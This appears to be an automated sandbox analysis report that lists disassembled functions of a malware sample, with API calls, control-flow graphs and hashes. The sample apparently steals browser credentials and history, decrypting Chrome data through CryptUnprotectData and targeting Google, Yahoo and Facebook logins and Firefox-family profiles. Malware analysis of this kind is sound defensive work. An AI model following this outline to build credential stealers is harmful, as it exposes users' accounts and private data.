                          • CopyFileW.KERNEL32(00445FAE,?,00000000), ref: 0040B82D
                          • CloseHandle.KERNELBASE(00000000), ref: 0040B838
                          • memset.MSVCRT ref: 0040B851
                          • memset.MSVCRT ref: 0040B8CA
                          • memcmp.MSVCRT ref: 0040B9BF
                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                          • memset.MSVCRT ref: 0040BB53
                          • memcpy.MSVCRT ref: 0040BB66
                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                          • String ID: chp$v10
                          • API String ID: 1297422669-2783969131
                          • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                          • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                          Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                            • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                          • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                          • UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                          • CloseHandle.KERNELBASE(?), ref: 0040E13E
                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                          • CloseHandle.KERNEL32(?), ref: 0040E148
                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                          • String ID: bhv
                          • API String ID: 4234240956-2689659898
                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                          Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 560 413f4f-413f52 561 413fa5 560->561 562 413f54-413f5a call 40a804 560->562 564 413f5f-413fa4 GetProcAddress * 5 562->564 564->561
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                          • API String ID: 2941347001-70141382
                          • Opcode ID: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                          • Opcode Fuzzy Hash: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                          Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 565 4466f4-44670e call 446904 GetModuleHandleA 568 446710-44671b 565->568 569 44672f-446732 565->569 568->569 570 44671d-446726 568->570 571 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 569->571 573 446747-44674b 570->573 574 446728-44672d 570->574 578 4467ac-4467b7 __setusermatherr 571->578 579 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 571->579 573->569 577 44674d-44674f 573->577 574->569 576 446734-44673b 574->576 576->569 580 44673d-446745 576->580 581 446755-446758 577->581 578->579 584 446810-446819 579->584 585 44681e-446825 579->585 580->581 581->571 586 4468d8-4468dd call 44693d 584->586 587 446827-446832 585->587 588 44686c-446870 585->588 591 446834-446838 587->591 592 44683a-44683e 587->592 589 446845-44684b 588->589 590 446872-446877 588->590 596 446853-446864 GetStartupInfoW 589->596 597 44684d-446851 589->597 590->588 591->587 591->592 592->589 594 446840-446842 592->594 594->589 598 446866-44686a 596->598 599 446879-44687b 596->599 597->594 597->596 600 44687c-446894 GetModuleHandleA call 41276d 598->600 599->600 603 446896-446897 exit 600->603 604 44689d-4468d6 _cexit 600->604 603->604 604->586
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                          • String ID:
                          • API String ID: 2791496988-0
                          • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                          • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                          Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0040C298
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                          • wcschr.MSVCRT ref: 0040C324
                          • wcschr.MSVCRT ref: 0040C344
                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                          • GetLastError.KERNEL32 ref: 0040C373
                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                          • String ID: visited:
                          • API String ID: 2470578098-1702587658
                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                          Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 631 40e175-40e1a1 call 40695d call 406b90 636 40e1a7-40e1e5 memset 631->636 637 40e299-40e2a8 call 4069a3 631->637 639 40e1e8-40e1fa call 406e8f 636->639 643 40e270-40e27d call 406b53 639->643 644 40e1fc-40e219 call 40dd50 * 2 639->644 643->639 649 40e283-40e286 643->649 644->643 655 40e21b-40e21d 644->655 652 40e291-40e294 call 40aa04 649->652 653 40e288-40e290 ??3@YAXPAX@Z 649->653 652->637 653->652 655->643 656 40e21f-40e235 call 40742e 655->656 656->643 659 40e237-40e242 call 40aae3 656->659 659->643 662 40e244-40e26b _snwprintf call 40a8d0 659->662 662->643
                          APIs
                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                          • memset.MSVCRT ref: 0040E1BD
                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                          • _snwprintf.MSVCRT ref: 0040E257
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                          • API String ID: 3883404497-2982631422
                          • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                          • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                          Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                          • memset.MSVCRT ref: 0040BC75
                          • memset.MSVCRT ref: 0040BC8C
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                          • memcmp.MSVCRT ref: 0040BCD6
                          • memcpy.MSVCRT ref: 0040BD2B
                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                          • String ID:
                          • API String ID: 115830560-3916222277
                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                          Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 716 41837f-4183bf 717 4183c1-4183cc call 418197 716->717 718 4183dc-4183ec call 418160 716->718 723 4183d2-4183d8 717->723 724 418517-41851d 717->724 725 4183f6-41840b 718->725 726 4183ee-4183f1 718->726 723->718 727 418417-418423 725->727 728 41840d-418415 725->728 726->724 729 418427-418442 call 41739b 727->729 728->729 732 418444-41845d CreateFileW 729->732 733 41845f-418475 CreateFileA 729->733 734 418477-41847c 732->734 733->734 735 4184c2-4184c7 734->735 736 41847e-418495 GetLastError ??3@YAXPAX@Z 734->736 739 4184d5-418501 memset call 418758 735->739 740 4184c9-4184d3 735->740 737 4184b5-4184c0 call 444706 736->737 738 418497-4184b3 call 41837f 736->738 737->724 738->724 746 418506-418515 ??3@YAXPAX@Z 739->746 740->739 746->724
                          APIs
                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                          • GetLastError.KERNEL32 ref: 0041847E
                          • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CreateFile$??3@ErrorLast
                          • String ID: |A
                          • API String ID: 1407640353-1717621600
                          • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                          • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                          Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 747 40d134-40d13b 748 40d142-40d14e 747->748 749 40d13d call 40d092 747->749 750 40d160 748->750 751 40d150-40d159 748->751 749->748 755 40d162-40d164 750->755 753 40d15b-40d15e 751->753 754 40d18d-40d19f 751->754 753->750 753->751 754->755 756 40d295 755->756 757 40d16a-40d170 755->757 760 40d297-40d299 756->760 758 40d1a1-40d1a9 757->758 759 40d172-40d18b GetModuleHandleW 757->759 762 40d1f8-40d206 call 40d29a 758->762 763 40d1ab-40d1cb wcscpy call 40d626 758->763 761 40d20b-40d214 LoadStringW 759->761 764 40d216 761->764 762->761 771 40d1cd-40d1dd wcslen 763->771 772 40d1df-40d1f6 GetModuleHandleW 763->772 767 40d218-40d227 764->767 768 40d28e-40d293 764->768 767->768 770 40d229-40d235 767->770 768->760 770->768 773 40d237-40d28c memcpy 770->773 771->764 771->772 772->761 773->756 773->768
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                          • wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                          • wcslen.MSVCRT ref: 0040D1D3
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                          • memcpy.MSVCRT ref: 0040D24C
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                          • String ID: strings
                          • API String ID: 3166385802-3030018805
                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                          Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                          • String ID: r!A
                          • API String ID: 2791114272-628097481
                          • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                          • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                          Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                          • _wcslwr.MSVCRT ref: 0040C817
                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                          • wcslen.MSVCRT ref: 0040C82C
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                          • API String ID: 62308376-4196376884
                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                          Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00403CBF
                          • memset.MSVCRT ref: 00403CD4
                          • memset.MSVCRT ref: 00403CE9
                          • memset.MSVCRT ref: 00403CFE
                          • memset.MSVCRT ref: 00403D13
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 00403DDA
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Waterfox$Waterfox\Profiles
                          • API String ID: 4039892925-11920434
                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                          Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00403E50
                          • memset.MSVCRT ref: 00403E65
                          • memset.MSVCRT ref: 00403E7A
                          • memset.MSVCRT ref: 00403E8F
                          • memset.MSVCRT ref: 00403EA4
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 00403F6B
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                          • API String ID: 4039892925-2068335096
                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
